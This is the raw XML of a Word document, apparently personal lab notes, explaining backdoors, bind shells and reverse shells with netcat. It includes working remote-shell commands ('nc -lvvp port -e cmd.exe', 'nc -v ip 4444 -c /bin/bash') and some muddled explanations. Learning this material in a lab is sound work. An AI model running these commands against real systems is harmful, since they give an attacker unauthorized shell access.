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/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC00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highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Backdoor :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Backdoor allows attacker to maintain access </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none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scenerio : give windows backdoor to linux try for linux</w:t>
      </w:r>
    </w:p>
    <w:p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Victim is listening </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and the attacker connects to the listener in order to gain remote access to the target system.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 bind shell is a sort of setup where remote consoles are established with other computers over the network. In Bind shell, an attacker launches a service on the target computer, to which the attacker can connect. In a bind shell, an attacker can connect to the target computer and execute commands on the target computer. To launch a bind shell, the attacker must have the IP address of the victim to access the target computer.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                 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4810760" cy="1848485"/>
            <wp:effectExtent l="0" t="0" r="8890" b="18415"/>
            <wp:docPr id="3" name="Picture 3" descr="BindShell-660x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indShell-660x3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Windows :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/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c:\tools\nc111nt&gt;nc -lvvp port -e cmd.exe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-l listen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-vv double verbose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-p port</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720" w:leftChars="0" w:firstLine="720" w:firstLineChars="0"/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-e execute by giving access to cmd.exe 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Open cmd where you have installed netcat .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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6574155" cy="1706880"/>
            <wp:effectExtent l="0" t="0" r="171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6718" t="10757" r="43043" b="66043"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="65741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Linux : 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ab/>
      </w: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$sudo apt-get install netcat </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="720" w:firstLineChars="0"/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$nc -v win ip port </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="double" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBd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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w: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You will get widows cmd access </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="double" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBd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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6562090" cy="1067435"/>
            <wp:effectExtent l="0" t="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29569" t="74383" r="2230" b="6349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lang w:val="en-US"/>
        </w:rPr>
        <w:t>*************************************-*************************************</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs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Reverse Bind shell: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Attacker is listening and victim has connected which has resulted in acess to victim shell .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>A reverse shell or connect-back is a setup, where the attacker must first start the server on his machine, while the target machine will have to act as a client that connects to the server served by the attacker. After the successful connection, the attacker can gain access to the shell of the target computer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>To launch a Reverse shell, the attacker doesn’t need to know the IP address of the victim to access the target computer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto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One who initiates the connection is server and server is always on listening position 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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6256020" cy="2378075"/>
            <wp:effectExtent l="0" t="0" r="11430" b="3175"/>
            <wp:docPr id="4" name="Picture 4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 xml:space="preserve">Machine 1(attacker) and machine 2(victim): now victim will visit attacker and will give him access to shell .  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:b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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Win : 131 attacker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Victim : 128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Win :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="7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-cmd &gt; nc -lvvp 4444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Deb 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>-nc -v ip of win 4444 -c /bin/bash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Then run who ami I command on win . </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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lang w:val="en-US"/>
        </w:rPr>
        <w:t>*************************************-*************************************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ED7D31" w:sz="4" w:space="1"/>
        <w:left w:val="single" w:color="ED7D31" w:sz="4" w:space="4"/>
        <w:bottom w:val="single" w:color="ED7D31" w:sz="4" w:space="1"/>
        <w:right w:val="single" w:color="ED7D31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64D5D"/>
    <w:rsid w:val="18B64D5D"/>
    <w:rsid w:val="4ECF0BD8"/>
    <w:rsid w:val="5C99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2023-07-08T14:31:00Z</dcterms:created>
  <dc:creator>Omkar Gadre</dc:creator>
  <cp:lastModifiedBy>Omkar Gadre</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-09T14:49:33Z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786813E38E804F08BA474985CCB487DD</vt:lpwstr>
  </property>
</Properties>
</file>